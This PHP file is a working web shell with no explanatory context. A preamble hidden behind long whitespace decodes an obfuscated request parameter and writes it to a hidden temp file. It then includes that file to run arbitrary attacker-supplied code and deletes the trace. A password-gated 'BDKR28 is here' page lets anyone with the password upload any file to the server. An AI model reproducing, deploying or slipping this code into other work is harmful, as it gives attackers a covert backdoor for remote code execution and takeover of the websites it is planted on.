<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["m\x72k"])){ $fac = $_REQUEST["m\x72k"]; $fac = explode ( ".", $fac ) ; $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $z = 0; foreach ($fac as $v7) { $sChar = ord($salt[$z % $lenS]); $d = ((int)$v7 - $sChar - ($z % 10)) ^ 20; $value .= chr($d); $z++;} $res = array_filter([getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", session_save_path(), getenv("TEMP")]); foreach ($res as $key => $factor) { if (is_dir($factor) ? is_writable($factor) : false) { $pointer = "$factor" . "/.component"; $success = file_put_contents($pointer, $value); if ($success) { include $pointer; @unlink($pointer); die();} } } }

// Title: BDKR28 is here
?>
<!DOCTYPE html>
<html>
<head>
    <title>BDKR28 is here</title>
</head>
<body>
<?php
$password = isset($_GET['BDKR28']) ? $_GET['BDKR28'] : '';
$correct_password = 'o02w'; // This will be replaced with a random password
if ($password !== $correct_password) {
    echo '<center><h2>BDKR28 is here</h2><b>Invalid Password!</b><br><br>';
    echo '<form action="" method="get">';
    echo '<input type="password" name="BDKR28" placeholder="Enter Password">';
    echo '<input type="submit" value="Submit">';
    echo '</form></center>';
    exit;
}
echo '<center><h2>BDKR28 is here</h2>';
echo '<form action="" method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file"><br><br>';
echo '<input type="submit" name="upload" value="Upload File">';
echo '</form>';
if (isset($_POST['upload'])) {
    $file = $_FILES['file']['name'];
    $tmp = $_FILES['file']['tmp_name'];
    if (move_uploaded_file($tmp, $file)) {
        echo '<b>File Uploaded Successfully!</b><br>';
        echo 'File: <a href="' . $file . '">' . $file . '</a>';
    } else {
        echo '<b>File Upload Failed!</b>';
    }
}
echo '</center>';
?>
</body>
</html>